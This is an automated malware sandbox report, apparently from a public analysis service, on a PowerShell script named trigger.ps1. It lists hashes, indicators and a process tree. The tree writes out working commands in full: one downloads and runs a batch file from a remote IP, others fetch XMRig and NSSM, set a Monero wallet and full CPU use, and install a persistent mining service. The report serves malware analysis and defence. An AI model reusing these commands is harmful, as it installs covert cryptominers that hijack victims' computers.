Analysis
-
max time kernel
1140s -
max time network
1125s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system -
submitted
05-07-2024 10:55
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
trigger.ps1
Resource
win10v2004-20240704-en
General
-
Target
trigger.ps1
-
Size
148B
-
MD5
24ad6c631c1a6215f9b8a06a9994088d
-
SHA1
c4a1221c00552e5d72c550e2d83aa5675d562092
-
SHA256
8b2327fa7051814f975435494a19b02ecd4ace11ea8b63d6cb9bc9d924e6b44b
-
SHA512
6026a86805a526a1a84b31bcee01ab60fa7eba7d98e56dec1b6ff8b0bd2ffe74ac24a7c2a3e33263faa3a38867a9147fcaaa45db1d0d945fe94a2006e95461d6
Malware Config
Extracted
http://185.254.97.190:2024/test.txt
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip
Extracted
https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral3/files/0x000100000002aa09-73.dat family_xmrig behavioral3/files/0x000100000002aa09-73.dat xmrig behavioral3/memory/4208-76-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-201-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-202-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-203-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-204-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-205-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-206-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-207-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-208-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-209-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-210-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-211-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-212-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-213-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-214-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-215-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-216-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-217-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-218-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-219-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-220-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-221-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-222-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-223-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-224-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-225-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-226-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-227-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-228-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-229-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-230-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-231-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-232-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-234-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-235-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-236-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-237-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-238-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-239-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-240-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-241-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-242-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-243-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-244-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-245-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-246-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-247-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-248-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-249-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-250-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-251-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-252-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-253-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-254-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-255-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-256-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-257-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-258-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-259-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-260-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-261-0x0000000000400000-0x000000000102B000-memory.dmp xmrig behavioral3/memory/4380-262-0x0000000000400000-0x000000000102B000-memory.dmp xmrig -
Blocklisted process makes network request 4 IoCs
flow pid Process 1 4516 powershell.exe 3 2152 powershell.exe 4 2092 powershell.exe 5 4340 powershell.exe -
Executes dropped EXE 9 IoCs
pid Process 4208 xmrig.exe 2240 nssm.exe 864 nssm.exe 3420 nssm.exe 4260 nssm.exe 496 nssm.exe 4112 nssm.exe 2984 nssm.exe 4380 xmrig.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 2 raw.githubusercontent.com 4 raw.githubusercontent.com 5 raw.githubusercontent.com -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4160 sc.exe 988 sc.exe 2636 sc.exe 1352 sc.exe -
pid Process 1812 powershell.exe 1576 powershell.exe 2152 powershell.exe 4568 powershell.exe 1132 powershell.exe 4516 powershell.exe 4576 powershell.exe 2684 powershell.exe 2092 powershell.exe 4340 powershell.exe 3384 powershell.exe 4640 powershell.exe 4452 powershell.exe 1712 powershell.exe -
Delays execution with timeout.exe 64 IoCs
pid Process 3460 timeout.exe 1336 timeout.exe 4916 Process not Found 3364 timeout.exe 3208 Process not Found 1032 timeout.exe 2128 timeout.exe 956 timeout.exe 2464 timeout.exe 2868 timeout.exe 1200 Process not Found 3308 Process not Found 3244 timeout.exe 3936 timeout.exe 904 timeout.exe 4812 Process not Found 2084 timeout.exe 4944 Process not Found 1200 Process not Found 924 timeout.exe 860 Process not Found 4140 Process not Found 5008 Process not Found 4780 timeout.exe 1476 timeout.exe 1976 timeout.exe 2080 timeout.exe 3504 timeout.exe 2972 timeout.exe 4564 timeout.exe 2272 Process not Found 412 timeout.exe 3988 timeout.exe 1304 timeout.exe 1360 timeout.exe 500 timeout.exe 3912 timeout.exe 3608 timeout.exe 4500 timeout.exe 3088 timeout.exe 4280 Process not Found 4700 Process not Found 1512 Process not Found 4812 Process not Found 680 timeout.exe 1044 Process not Found 2388 Process not Found 2820 Process not Found 2324 timeout.exe 3368 timeout.exe 592 Process not Found 1960 Process not Found 808 timeout.exe 2960 timeout.exe 3468 timeout.exe 1192 timeout.exe 1448 timeout.exe 5076 Process not Found 3448 Process not Found 2968 timeout.exe 2536 Process not Found 1868 Process not Found 1364 Process not Found 2516 timeout.exe -
Kills process with taskkill 2 IoCs
pid Process 4084 taskkill.exe 4340 taskkill.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4516 powershell.exe 4516 powershell.exe 2152 powershell.exe 2152 powershell.exe 2092 powershell.exe 2092 powershell.exe 4568 powershell.exe 4568 powershell.exe 4576 powershell.exe 4576 powershell.exe 1132 powershell.exe 1132 powershell.exe 4640 powershell.exe 4640 powershell.exe 1812 powershell.exe 1812 powershell.exe 4452 powershell.exe 4452 powershell.exe 1576 powershell.exe 1576 powershell.exe 2684 powershell.exe 2684 powershell.exe 1712 powershell.exe 1712 powershell.exe 4340 powershell.exe 4340 powershell.exe 3384 powershell.exe 3384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4516 powershell.exe Token: SeDebugPrivilege 4084 taskkill.exe Token: SeDebugPrivilege 2152 powershell.exe Token: SeDebugPrivilege 4340 taskkill.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 4568 powershell.exe Token: SeDebugPrivilege 4576 powershell.exe Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 4640 powershell.exe Token: SeDebugPrivilege 1812 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 1576 powershell.exe Token: SeDebugPrivilege 2684 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 3384 powershell.exe Token: SeLockMemoryPrivilege 4380 xmrig.exe Token: SeIncreaseQuotaPrivilege 1900 WMIC.exe Token: SeSecurityPrivilege 1900 WMIC.exe Token: SeTakeOwnershipPrivilege 1900 WMIC.exe Token: SeLoadDriverPrivilege 1900 WMIC.exe Token: SeSystemProfilePrivilege 1900 WMIC.exe Token: SeSystemtimePrivilege 1900 WMIC.exe Token: SeProfSingleProcessPrivilege 1900 WMIC.exe Token: SeIncBasePriorityPrivilege 1900 WMIC.exe Token: SeCreatePagefilePrivilege 1900 WMIC.exe Token: SeBackupPrivilege 1900 WMIC.exe Token: SeRestorePrivilege 1900 WMIC.exe Token: SeShutdownPrivilege 1900 WMIC.exe Token: SeDebugPrivilege 1900 WMIC.exe Token: SeSystemEnvironmentPrivilege 1900 WMIC.exe Token: SeRemoteShutdownPrivilege 1900 WMIC.exe Token: SeUndockPrivilege 1900 WMIC.exe Token: SeManageVolumePrivilege 1900 WMIC.exe Token: 33 1900 WMIC.exe Token: 34 1900 WMIC.exe Token: 35 1900 WMIC.exe Token: 36 1900 WMIC.exe Token: SeIncreaseQuotaPrivilege 1900 WMIC.exe Token: SeSecurityPrivilege 1900 WMIC.exe Token: SeTakeOwnershipPrivilege 1900 WMIC.exe Token: SeLoadDriverPrivilege 1900 WMIC.exe Token: SeSystemProfilePrivilege 1900 WMIC.exe Token: SeSystemtimePrivilege 1900 WMIC.exe Token: SeProfSingleProcessPrivilege 1900 WMIC.exe Token: SeIncBasePriorityPrivilege 1900 WMIC.exe Token: SeCreatePagefilePrivilege 1900 WMIC.exe Token: SeBackupPrivilege 1900 WMIC.exe Token: SeRestorePrivilege 1900 WMIC.exe Token: SeShutdownPrivilege 1900 WMIC.exe Token: SeDebugPrivilege 1900 WMIC.exe Token: SeSystemEnvironmentPrivilege 1900 WMIC.exe Token: SeRemoteShutdownPrivilege 1900 WMIC.exe Token: SeUndockPrivilege 1900 WMIC.exe Token: SeManageVolumePrivilege 1900 WMIC.exe Token: 33 1900 WMIC.exe Token: 34 1900 WMIC.exe Token: 35 1900 WMIC.exe Token: 36 1900 WMIC.exe Token: SeIncreaseQuotaPrivilege 3112 WMIC.exe Token: SeSecurityPrivilege 3112 WMIC.exe Token: SeTakeOwnershipPrivilege 3112 WMIC.exe Token: SeLoadDriverPrivilege 3112 WMIC.exe Token: SeSystemProfilePrivilege 3112 WMIC.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4380 xmrig.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4516 wrote to memory of 4584 4516 powershell.exe 81 PID 4516 wrote to memory of 4584 4516 powershell.exe 81 PID 4584 wrote to memory of 4084 4584 cmd.exe 83 PID 4584 wrote to memory of 4084 4584 cmd.exe 83 PID 4584 wrote to memory of 2152 4584 cmd.exe 85 PID 4584 wrote to memory of 2152 4584 cmd.exe 85 PID 2152 wrote to memory of 3484 2152 powershell.exe 86 PID 2152 wrote to memory of 3484 2152 powershell.exe 86 PID 3484 wrote to memory of 480 3484 cmd.exe 87 PID 3484 wrote to memory of 480 3484 cmd.exe 87 PID 480 wrote to memory of 3584 480 net.exe 88 PID 480 wrote to memory of 3584 480 net.exe 88 PID 3484 wrote to memory of 2872 3484 cmd.exe 89 PID 3484 wrote to memory of 2872 3484 cmd.exe 89 PID 3484 wrote to memory of 3816 3484 cmd.exe 90 PID 3484 wrote to memory of 3816 3484 cmd.exe 90 PID 3484 wrote to memory of 1956 3484 cmd.exe 91 PID 3484 wrote to memory of 1956 3484 cmd.exe 91 PID 3484 wrote to memory of 3248 3484 cmd.exe 92 PID 3484 wrote to memory of 3248 3484 cmd.exe 92 PID 3484 wrote to memory of 4024 3484 cmd.exe 93 PID 3484 wrote to memory of 4024 3484 cmd.exe 93 PID 3484 wrote to memory of 4160 3484 cmd.exe 94 PID 3484 wrote to memory of 4160 3484 cmd.exe 94 PID 3484 wrote to memory of 988 3484 cmd.exe 95 PID 3484 wrote to memory of 988 3484 cmd.exe 95 PID 3484 wrote to memory of 4340 3484 cmd.exe 96 PID 3484 wrote to memory of 4340 3484 cmd.exe 96 PID 3484 wrote to memory of 2092 3484 cmd.exe 97 PID 3484 wrote to memory of 2092 3484 cmd.exe 97 PID 3484 wrote to memory of 4568 3484 cmd.exe 98 PID 3484 wrote to memory of 4568 3484 cmd.exe 98 PID 3484 wrote to memory of 4576 3484 cmd.exe 99 PID 3484 wrote to memory of 4576 3484 cmd.exe 99 PID 3484 wrote to memory of 4208 3484 cmd.exe 100 PID 3484 wrote to memory of 4208 3484 cmd.exe 100 PID 3484 wrote to memory of 4448 3484 cmd.exe 101 PID 3484 wrote to memory of 4448 3484 cmd.exe 101 PID 4448 wrote to memory of 1132 4448 cmd.exe 102 PID 4448 wrote to memory of 1132 4448 cmd.exe 102 PID 1132 wrote to memory of 4900 1132 powershell.exe 103 PID 1132 wrote to memory of 4900 1132 powershell.exe 103 PID 3484 wrote to memory of 4640 3484 cmd.exe 104 PID 3484 wrote to memory of 4640 3484 cmd.exe 104 PID 3484 wrote to memory of 1812 3484 cmd.exe 105 PID 3484 wrote to memory of 1812 3484 cmd.exe 105 PID 3484 wrote to memory of 4452 3484 cmd.exe 106 PID 3484 wrote to memory of 4452 3484 cmd.exe 106 PID 3484 wrote to memory of 1576 3484 cmd.exe 107 PID 3484 wrote to memory of 1576 3484 cmd.exe 107 PID 3484 wrote to memory of 2684 3484 cmd.exe 108 PID 3484 wrote to memory of 2684 3484 cmd.exe 108 PID 3484 wrote to memory of 1712 3484 cmd.exe 109 PID 3484 wrote to memory of 1712 3484 cmd.exe 109 PID 3484 wrote to memory of 4340 3484 cmd.exe 110 PID 3484 wrote to memory of 4340 3484 cmd.exe 110 PID 3484 wrote to memory of 3384 3484 cmd.exe 111 PID 3484 wrote to memory of 3384 3484 cmd.exe 111 PID 3484 wrote to memory of 2636 3484 cmd.exe 112 PID 3484 wrote to memory of 2636 3484 cmd.exe 112 PID 3484 wrote to memory of 1352 3484 cmd.exe 113 PID 3484 wrote to memory of 1352 3484 cmd.exe 113 PID 3484 wrote to memory of 2240 3484 cmd.exe 114 PID 3484 wrote to memory of 2240 3484 cmd.exe 114
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4516 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\script_0cbebcc2.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\system32\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4084
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://185.254.97.190:2024/test.txt', $tempfile); & $tempfile 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK; Remove-Item -Force $tempfile"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC10E.tmp.bat" 497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK"4⤵
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Windows\system32\net.exenet session5⤵
- Suspicious use of WriteProcessMemory
PID:480 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session6⤵PID:3584
-
-
-
C:\Windows\system32\where.exewhere powershell5⤵PID:2872
-
-
C:\Windows\system32\where.exewhere find5⤵PID:3816
-
-
C:\Windows\system32\where.exewhere findstr5⤵PID:1956
-
-
C:\Windows\system32\where.exewhere tasklist5⤵PID:3248
-
-
C:\Windows\system32\where.exewhere sc5⤵PID:4024
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner5⤵
- Launches sc.exe
PID:4160
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner5⤵
- Launches sc.exe
PID:988
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im xmrig.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4576
-
-
C:\Users\Admin\moneroocean\xmrig.exe"C:\Users\Admin\moneroocean\xmrig.exe" --help5⤵
- Executes dropped EXE
PID:4208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"5⤵
- Suspicious use of WriteProcessMemory
PID:4448 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\system32\HOSTNAME.EXE"C:\Windows\system32\HOSTNAME.EXE"7⤵PID:4900
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10001\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"497hJCXeEYxAcPk3Wpri7rdhMtcjDZqtZfNunptFjH22LTQkWxGqDKQHSeeqCmyoUigwog52521qcNcCsx4zy9ZC7fogkNK\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Trrkauui\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3384
-
-
C:\Windows\system32\sc.exesc stop moneroocean_miner5⤵
- Launches sc.exe
PID:2636
-
-
C:\Windows\system32\sc.exesc delete moneroocean_miner5⤵
- Launches sc.exe
PID:1352
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"5⤵
- Executes dropped EXE
PID:2240
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"5⤵
- Executes dropped EXE
PID:864
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS5⤵
- Executes dropped EXE
PID:3420
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"5⤵
- Executes dropped EXE
PID:4260
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"5⤵
- Executes dropped EXE
PID:496
-
-
C:\Users\Admin\moneroocean\nssm.exe"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner5⤵
- Executes dropped EXE
PID:4112
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4180
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3088
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1304
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3112
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:5036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3380
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1884
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:788
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1492
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3556
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:4940
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3308
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:3644
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:348
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4804
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:1808
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1044
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1332
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:4640
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:1612
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:3984
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2040
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:424
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:1288
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:5052
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵PID:2748
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:456
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:2264
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:2084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage3⤵PID:4452
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get loadpercentage4⤵PID:260
-
-
-
C:\Windows\system32\timeout.exetimeout /t 13⤵
- Delays execution with timeout.exe
PID:3988
-
-
